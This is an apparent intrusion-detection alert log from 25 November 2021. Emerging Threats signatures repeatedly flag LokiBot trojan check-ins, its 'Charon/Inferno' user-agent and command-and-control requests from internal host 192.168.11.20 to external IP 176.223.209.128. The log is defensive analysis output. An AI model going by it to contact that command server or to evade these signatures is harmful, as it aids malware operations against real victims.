11/25/21-10:51:06.737953	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50188	80	192.168.11.20	176.223.209.128
11/25/21-10:51:06.737953	TCP	2025381	ET TROJAN LokiBot Checkin	50188	80	192.168.11.20	176.223.209.128
11/25/21-10:51:06.737953	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50188	80	192.168.11.20	176.223.209.128
11/25/21-10:51:07.173148	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50189	80	192.168.11.20	176.223.209.128
11/25/21-10:51:07.173148	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50189	80	192.168.11.20	176.223.209.128
11/25/21-10:51:07.173148	TCP	2025381	ET TROJAN LokiBot Checkin	50189	80	192.168.11.20	176.223.209.128
11/25/21-10:51:07.173148	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50189	80	192.168.11.20	176.223.209.128
11/25/21-10:51:07.681215	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50190	80	192.168.11.20	176.223.209.128
11/25/21-10:51:07.681215	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50190	80	192.168.11.20	176.223.209.128
11/25/21-10:51:07.681215	TCP	2025381	ET TROJAN LokiBot Checkin	50190	80	192.168.11.20	176.223.209.128
11/25/21-10:51:07.681215	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50190	80	192.168.11.20	176.223.209.128
11/25/21-10:51:08.197546	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50191	80	192.168.11.20	176.223.209.128
11/25/21-10:51:08.197546	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50191	80	192.168.11.20	176.223.209.128
11/25/21-10:51:08.197546	TCP	2025381	ET TROJAN LokiBot Checkin	50191	80	192.168.11.20	176.223.209.128
11/25/21-10:51:08.197546	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50191	80	192.168.11.20	176.223.209.128
11/25/21-10:51:08.699100	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50192	80	192.168.11.20	176.223.209.128
11/25/21-10:51:08.699100	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50192	80	192.168.11.20	176.223.209.128
11/25/21-10:51:08.699100	TCP	2025381	ET TROJAN LokiBot Checkin	50192	80	192.168.11.20	176.223.209.128
11/25/21-10:51:08.699100	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50192	80	192.168.11.20	176.223.209.128
11/25/21-10:51:09.171002	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50193	80	192.168.11.20	176.223.209.128
11/25/21-10:51:09.171002	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50193	80	192.168.11.20	176.223.209.128
11/25/21-10:51:09.171002	TCP	2025381	ET TROJAN LokiBot Checkin	50193	80	192.168.11.20	176.223.209.128
11/25/21-10:51:09.171002	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50193	80	192.168.11.20	176.223.209.128
11/25/21-10:51:09.689189	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50194	80	192.168.11.20	176.223.209.128
11/25/21-10:51:09.689189	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50194	80	192.168.11.20	176.223.209.128
11/25/21-10:51:09.689189	TCP	2025381	ET TROJAN LokiBot Checkin	50194	80	192.168.11.20	176.223.209.128
11/25/21-10:51:09.689189	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50194	80	192.168.11.20	176.223.209.128
11/25/21-10:51:10.157749	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50195	80	192.168.11.20	176.223.209.128
11/25/21-10:51:10.157749	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50195	80	192.168.11.20	176.223.209.128
11/25/21-10:51:10.157749	TCP	2025381	ET TROJAN LokiBot Checkin	50195	80	192.168.11.20	176.223.209.128
11/25/21-10:51:10.157749	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50195	80	192.168.11.20	176.223.209.128
11/25/21-10:51:10.674042	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50196	80	192.168.11.20	176.223.209.128
11/25/21-10:51:10.674042	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50196	80	192.168.11.20	176.223.209.128
11/25/21-10:51:10.674042	TCP	2025381	ET TROJAN LokiBot Checkin	50196	80	192.168.11.20	176.223.209.128
11/25/21-10:51:10.674042	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50196	80	192.168.11.20	176.223.209.128
11/25/21-10:51:11.173859	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50197	80	192.168.11.20	176.223.209.128
11/25/21-10:51:11.173859	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50197	80	192.168.11.20	176.223.209.128
11/25/21-10:51:11.173859	TCP	2025381	ET TROJAN LokiBot Checkin	50197	80	192.168.11.20	176.223.209.128
11/25/21-10:51:11.173859	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50197	80	192.168.11.20	176.223.209.128
11/25/21-10:51:11.656343	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50198	80	192.168.11.20	176.223.209.128
11/25/21-10:51:11.656343	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50198	80	192.168.11.20	176.223.209.128
11/25/21-10:51:11.656343	TCP	2025381	ET TROJAN LokiBot Checkin	50198	80	192.168.11.20	176.223.209.128
11/25/21-10:51:11.656343	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50198	80	192.168.11.20	176.223.209.128
11/25/21-10:51:12.172382	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50199	80	192.168.11.20	176.223.209.128
11/25/21-10:51:12.172382	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50199	80	192.168.11.20	176.223.209.128
11/25/21-10:51:12.172382	TCP	2025381	ET TROJAN LokiBot Checkin	50199	80	192.168.11.20	176.223.209.128
11/25/21-10:51:12.172382	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50199	80	192.168.11.20	176.223.209.128
11/25/21-10:51:12.686144	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50200	80	192.168.11.20	176.223.209.128
11/25/21-10:51:12.686144	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50200	80	192.168.11.20	176.223.209.128
11/25/21-10:51:12.686144	TCP	2025381	ET TROJAN LokiBot Checkin	50200	80	192.168.11.20	176.223.209.128
11/25/21-10:51:12.686144	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50200	80	192.168.11.20	176.223.209.128
11/25/21-10:51:13.206222	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50201	80	192.168.11.20	176.223.209.128
11/25/21-10:51:13.206222	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50201	80	192.168.11.20	176.223.209.128
11/25/21-10:51:13.206222	TCP	2025381	ET TROJAN LokiBot Checkin	50201	80	192.168.11.20	176.223.209.128
11/25/21-10:51:13.206222	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50201	80	192.168.11.20	176.223.209.128
11/25/21-10:51:13.758899	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50202	80	192.168.11.20	176.223.209.128
11/25/21-10:51:13.758899	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50202	80	192.168.11.20	176.223.209.128
11/25/21-10:51:13.758899	TCP	2025381	ET TROJAN LokiBot Checkin	50202	80	192.168.11.20	176.223.209.128
11/25/21-10:51:13.758899	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50202	80	192.168.11.20	176.223.209.128
11/25/21-10:51:14.276834	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50203	80	192.168.11.20	176.223.209.128
11/25/21-10:51:14.276834	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50203	80	192.168.11.20	176.223.209.128
11/25/21-10:51:14.276834	TCP	2025381	ET TROJAN LokiBot Checkin	50203	80	192.168.11.20	176.223.209.128
11/25/21-10:51:14.276834	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50203	80	192.168.11.20	176.223.209.128
11/25/21-10:51:14.793079	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50204	80	192.168.11.20	176.223.209.128
11/25/21-10:51:14.793079	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50204	80	192.168.11.20	176.223.209.128
11/25/21-10:51:14.793079	TCP	2025381	ET TROJAN LokiBot Checkin	50204	80	192.168.11.20	176.223.209.128
11/25/21-10:51:14.793079	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50204	80	192.168.11.20	176.223.209.128
11/25/21-10:51:15.296671	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50205	80	192.168.11.20	176.223.209.128
11/25/21-10:51:15.296671	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50205	80	192.168.11.20	176.223.209.128
11/25/21-10:51:15.296671	TCP	2025381	ET TROJAN LokiBot Checkin	50205	80	192.168.11.20	176.223.209.128
11/25/21-10:51:15.296671	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50205	80	192.168.11.20	176.223.209.128
11/25/21-10:51:15.731165	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50206	80	192.168.11.20	176.223.209.128
11/25/21-10:51:15.731165	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50206	80	192.168.11.20	176.223.209.128
11/25/21-10:51:15.731165	TCP	2025381	ET TROJAN LokiBot Checkin	50206	80	192.168.11.20	176.223.209.128
11/25/21-10:51:15.731165	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50206	80	192.168.11.20	176.223.209.128
11/25/21-10:51:16.250456	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50207	80	192.168.11.20	176.223.209.128
11/25/21-10:51:16.250456	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50207	80	192.168.11.20	176.223.209.128
11/25/21-10:51:16.250456	TCP	2025381	ET TROJAN LokiBot Checkin	50207	80	192.168.11.20	176.223.209.128
11/25/21-10:51:16.250456	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50207	80	192.168.11.20	176.223.209.128
11/25/21-10:51:16.767595	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50208	80	192.168.11.20	176.223.209.128
11/25/21-10:51:16.767595	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50208	80	192.168.11.20	176.223.209.128
11/25/21-10:51:16.767595	TCP	2025381	ET TROJAN LokiBot Checkin	50208	80	192.168.11.20	176.223.209.128
11/25/21-10:51:16.767595	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50208	80	192.168.11.20	176.223.209.128
11/25/21-10:51:17.275025	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50209	80	192.168.11.20	176.223.209.128
11/25/21-10:51:17.275025	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50209	80	192.168.11.20	176.223.209.128
11/25/21-10:51:17.275025	TCP	2025381	ET TROJAN LokiBot Checkin	50209	80	192.168.11.20	176.223.209.128
11/25/21-10:51:17.275025	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50209	80	192.168.11.20	176.223.209.128
11/25/21-10:51:17.712223	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50211	80	192.168.11.20	176.223.209.128
11/25/21-10:51:17.712223	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50211	80	192.168.11.20	176.223.209.128
11/25/21-10:51:17.712223	TCP	2025381	ET TROJAN LokiBot Checkin	50211	80	192.168.11.20	176.223.209.128
11/25/21-10:51:17.712223	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50211	80	192.168.11.20	176.223.209.128
11/25/21-10:51:18.178122	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50212	80	192.168.11.20	176.223.209.128
11/25/21-10:51:18.178122	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50212	80	192.168.11.20	176.223.209.128
11/25/21-10:51:18.178122	TCP	2025381	ET TROJAN LokiBot Checkin	50212	80	192.168.11.20	176.223.209.128
11/25/21-10:51:18.178122	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50212	80	192.168.11.20	176.223.209.128
11/25/21-10:51:18.705661	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50213	80	192.168.11.20	176.223.209.128
11/25/21-10:51:18.705661	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50213	80	192.168.11.20	176.223.209.128
11/25/21-10:51:18.705661	TCP	2025381	ET TROJAN LokiBot Checkin	50213	80	192.168.11.20	176.223.209.128
11/25/21-10:51:18.705661	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50213	80	192.168.11.20	176.223.209.128
11/25/21-10:51:19.166859	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50214	80	192.168.11.20	176.223.209.128
11/25/21-10:51:19.166859	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50214	80	192.168.11.20	176.223.209.128
11/25/21-10:51:19.166859	TCP	2025381	ET TROJAN LokiBot Checkin	50214	80	192.168.11.20	176.223.209.128
11/25/21-10:51:19.166859	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50214	80	192.168.11.20	176.223.209.128
11/25/21-10:51:19.718417	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50215	80	192.168.11.20	176.223.209.128
11/25/21-10:51:19.718417	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50215	80	192.168.11.20	176.223.209.128
11/25/21-10:51:19.718417	TCP	2025381	ET TROJAN LokiBot Checkin	50215	80	192.168.11.20	176.223.209.128
11/25/21-10:51:19.718417	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50215	80	192.168.11.20	176.223.209.128
11/25/21-10:51:20.224991	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50216	80	192.168.11.20	176.223.209.128
11/25/21-10:51:20.224991	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50216	80	192.168.11.20	176.223.209.128
11/25/21-10:51:20.224991	TCP	2025381	ET TROJAN LokiBot Checkin	50216	80	192.168.11.20	176.223.209.128
11/25/21-10:51:20.224991	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50216	80	192.168.11.20	176.223.209.128
11/25/21-10:51:20.725136	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50217	80	192.168.11.20	176.223.209.128
11/25/21-10:51:20.725136	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50217	80	192.168.11.20	176.223.209.128
11/25/21-10:51:20.725136	TCP	2025381	ET TROJAN LokiBot Checkin	50217	80	192.168.11.20	176.223.209.128
11/25/21-10:51:20.725136	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50217	80	192.168.11.20	176.223.209.128
11/25/21-10:51:21.156398	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50218	80	192.168.11.20	176.223.209.128
11/25/21-10:51:21.156398	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50218	80	192.168.11.20	176.223.209.128
11/25/21-10:51:21.156398	TCP	2025381	ET TROJAN LokiBot Checkin	50218	80	192.168.11.20	176.223.209.128
11/25/21-10:51:21.156398	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50218	80	192.168.11.20	176.223.209.128
11/25/21-10:51:21.660669	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50219	80	192.168.11.20	176.223.209.128
11/25/21-10:51:21.660669	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50219	80	192.168.11.20	176.223.209.128
11/25/21-10:51:21.660669	TCP	2025381	ET TROJAN LokiBot Checkin	50219	80	192.168.11.20	176.223.209.128
11/25/21-10:51:21.660669	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50219	80	192.168.11.20	176.223.209.128
11/25/21-10:51:22.171066	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50220	80	192.168.11.20	176.223.209.128
11/25/21-10:51:22.171066	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50220	80	192.168.11.20	176.223.209.128
11/25/21-10:51:22.171066	TCP	2025381	ET TROJAN LokiBot Checkin	50220	80	192.168.11.20	176.223.209.128
11/25/21-10:51:22.171066	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50220	80	192.168.11.20	176.223.209.128
11/25/21-10:51:22.650390	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50221	80	192.168.11.20	176.223.209.128
11/25/21-10:51:22.650390	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50221	80	192.168.11.20	176.223.209.128
11/25/21-10:51:22.650390	TCP	2025381	ET TROJAN LokiBot Checkin	50221	80	192.168.11.20	176.223.209.128
11/25/21-10:51:22.650390	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50221	80	192.168.11.20	176.223.209.128
11/25/21-10:51:23.144422	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50222	80	192.168.11.20	176.223.209.128
11/25/21-10:51:23.144422	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50222	80	192.168.11.20	176.223.209.128
11/25/21-10:51:23.144422	TCP	2025381	ET TROJAN LokiBot Checkin	50222	80	192.168.11.20	176.223.209.128
11/25/21-10:51:23.144422	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50222	80	192.168.11.20	176.223.209.128
11/25/21-10:51:23.652940	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50223	80	192.168.11.20	176.223.209.128
11/25/21-10:51:23.652940	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50223	80	192.168.11.20	176.223.209.128
11/25/21-10:51:23.652940	TCP	2025381	ET TROJAN LokiBot Checkin	50223	80	192.168.11.20	176.223.209.128
11/25/21-10:51:23.652940	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50223	80	192.168.11.20	176.223.209.128
11/25/21-10:51:24.110114	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50224	80	192.168.11.20	176.223.209.128
11/25/21-10:51:24.110114	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50224	80	192.168.11.20	176.223.209.128
11/25/21-10:51:24.110114	TCP	2025381	ET TROJAN LokiBot Checkin	50224	80	192.168.11.20	176.223.209.128
11/25/21-10:51:24.110114	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50224	80	192.168.11.20	176.223.209.128
11/25/21-10:51:24.605768	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50225	80	192.168.11.20	176.223.209.128
11/25/21-10:51:24.605768	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50225	80	192.168.11.20	176.223.209.128
11/25/21-10:51:24.605768	TCP	2025381	ET TROJAN LokiBot Checkin	50225	80	192.168.11.20	176.223.209.128
11/25/21-10:51:24.605768	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50225	80	192.168.11.20	176.223.209.128
11/25/21-10:51:25.134458	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50226	80	192.168.11.20	176.223.209.128
11/25/21-10:51:25.134458	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50226	80	192.168.11.20	176.223.209.128
11/25/21-10:51:25.134458	TCP	2025381	ET TROJAN LokiBot Checkin	50226	80	192.168.11.20	176.223.209.128
11/25/21-10:51:25.134458	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50226	80	192.168.11.20	176.223.209.128
11/25/21-10:51:25.644833	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50227	80	192.168.11.20	176.223.209.128
11/25/21-10:51:25.644833	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50227	80	192.168.11.20	176.223.209.128
11/25/21-10:51:25.644833	TCP	2025381	ET TROJAN LokiBot Checkin	50227	80	192.168.11.20	176.223.209.128
11/25/21-10:51:25.644833	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50227	80	192.168.11.20	176.223.209.128
11/25/21-10:51:26.123164	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50228	80	192.168.11.20	176.223.209.128
11/25/21-10:51:26.123164	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50228	80	192.168.11.20	176.223.209.128
11/25/21-10:51:26.123164	TCP	2025381	ET TROJAN LokiBot Checkin	50228	80	192.168.11.20	176.223.209.128
11/25/21-10:51:26.123164	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50228	80	192.168.11.20	176.223.209.128
11/25/21-10:51:26.626690	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50229	80	192.168.11.20	176.223.209.128
11/25/21-10:51:26.626690	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50229	80	192.168.11.20	176.223.209.128
11/25/21-10:51:26.626690	TCP	2025381	ET TROJAN LokiBot Checkin	50229	80	192.168.11.20	176.223.209.128
11/25/21-10:51:26.626690	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50229	80	192.168.11.20	176.223.209.128
11/25/21-10:51:27.099310	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50230	80	192.168.11.20	176.223.209.128
11/25/21-10:51:27.099310	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50230	80	192.168.11.20	176.223.209.128
11/25/21-10:51:27.099310	TCP	2025381	ET TROJAN LokiBot Checkin	50230	80	192.168.11.20	176.223.209.128
11/25/21-10:51:27.099310	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50230	80	192.168.11.20	176.223.209.128
11/25/21-10:51:27.588196	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50231	80	192.168.11.20	176.223.209.128
11/25/21-10:51:27.588196	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50231	80	192.168.11.20	176.223.209.128
11/25/21-10:51:27.588196	TCP	2025381	ET TROJAN LokiBot Checkin	50231	80	192.168.11.20	176.223.209.128
11/25/21-10:51:27.588196	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50231	80	192.168.11.20	176.223.209.128
11/25/21-10:51:28.063644	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50232	80	192.168.11.20	176.223.209.128
11/25/21-10:51:28.063644	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50232	80	192.168.11.20	176.223.209.128
11/25/21-10:51:28.063644	TCP	2025381	ET TROJAN LokiBot Checkin	50232	80	192.168.11.20	176.223.209.128
11/25/21-10:51:28.063644	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50232	80	192.168.11.20	176.223.209.128
11/25/21-10:51:28.555425	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50233	80	192.168.11.20	176.223.209.128
11/25/21-10:51:28.555425	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50233	80	192.168.11.20	176.223.209.128
11/25/21-10:51:28.555425	TCP	2025381	ET TROJAN LokiBot Checkin	50233	80	192.168.11.20	176.223.209.128
11/25/21-10:51:28.555425	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50233	80	192.168.11.20	176.223.209.128
11/25/21-10:51:29.050192	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50234	80	192.168.11.20	176.223.209.128
11/25/21-10:51:29.050192	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50234	80	192.168.11.20	176.223.209.128
11/25/21-10:51:29.050192	TCP	2025381	ET TROJAN LokiBot Checkin	50234	80	192.168.11.20	176.223.209.128
11/25/21-10:51:29.050192	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50234	80	192.168.11.20	176.223.209.128
11/25/21-10:51:29.546638	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50235	80	192.168.11.20	176.223.209.128
11/25/21-10:51:29.546638	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50235	80	192.168.11.20	176.223.209.128
11/25/21-10:51:29.546638	TCP	2025381	ET TROJAN LokiBot Checkin	50235	80	192.168.11.20	176.223.209.128
11/25/21-10:51:29.546638	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50235	80	192.168.11.20	176.223.209.128
11/25/21-10:51:30.065751	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50236	80	192.168.11.20	176.223.209.128
11/25/21-10:51:30.065751	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50236	80	192.168.11.20	176.223.209.128
11/25/21-10:51:30.065751	TCP	2025381	ET TROJAN LokiBot Checkin	50236	80	192.168.11.20	176.223.209.128
11/25/21-10:51:30.065751	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50236	80	192.168.11.20	176.223.209.128
11/25/21-10:51:30.571082	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50237	80	192.168.11.20	176.223.209.128
11/25/21-10:51:30.571082	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50237	80	192.168.11.20	176.223.209.128
11/25/21-10:51:30.571082	TCP	2025381	ET TROJAN LokiBot Checkin	50237	80	192.168.11.20	176.223.209.128
11/25/21-10:51:30.571082	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50237	80	192.168.11.20	176.223.209.128
11/25/21-10:51:31.087433	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50238	80	192.168.11.20	176.223.209.128
11/25/21-10:51:31.087433	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50238	80	192.168.11.20	176.223.209.128
11/25/21-10:51:31.087433	TCP	2025381	ET TROJAN LokiBot Checkin	50238	80	192.168.11.20	176.223.209.128
11/25/21-10:51:31.087433	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50238	80	192.168.11.20	176.223.209.128
11/25/21-10:51:31.605421	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50239	80	192.168.11.20	176.223.209.128
11/25/21-10:51:31.605421	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50239	80	192.168.11.20	176.223.209.128
11/25/21-10:51:31.605421	TCP	2025381	ET TROJAN LokiBot Checkin	50239	80	192.168.11.20	176.223.209.128
11/25/21-10:51:31.605421	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50239	80	192.168.11.20	176.223.209.128
11/25/21-10:51:32.121427	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50240	80	192.168.11.20	176.223.209.128
11/25/21-10:51:32.121427	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50240	80	192.168.11.20	176.223.209.128
11/25/21-10:51:32.121427	TCP	2025381	ET TROJAN LokiBot Checkin	50240	80	192.168.11.20	176.223.209.128
11/25/21-10:51:32.121427	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50240	80	192.168.11.20	176.223.209.128
11/25/21-10:51:32.627208	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50241	80	192.168.11.20	176.223.209.128
11/25/21-10:51:32.627208	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50241	80	192.168.11.20	176.223.209.128
11/25/21-10:51:32.627208	TCP	2025381	ET TROJAN LokiBot Checkin	50241	80	192.168.11.20	176.223.209.128
11/25/21-10:51:32.627208	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50241	80	192.168.11.20	176.223.209.128
11/25/21-10:51:33.085055	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50242	80	192.168.11.20	176.223.209.128
11/25/21-10:51:33.085055	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50242	80	192.168.11.20	176.223.209.128
11/25/21-10:51:33.085055	TCP	2025381	ET TROJAN LokiBot Checkin	50242	80	192.168.11.20	176.223.209.128
11/25/21-10:51:33.085055	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50242	80	192.168.11.20	176.223.209.128
11/25/21-10:51:33.603281	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50243	80	192.168.11.20	176.223.209.128
11/25/21-10:51:33.603281	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50243	80	192.168.11.20	176.223.209.128
11/25/21-10:51:33.603281	TCP	2025381	ET TROJAN LokiBot Checkin	50243	80	192.168.11.20	176.223.209.128
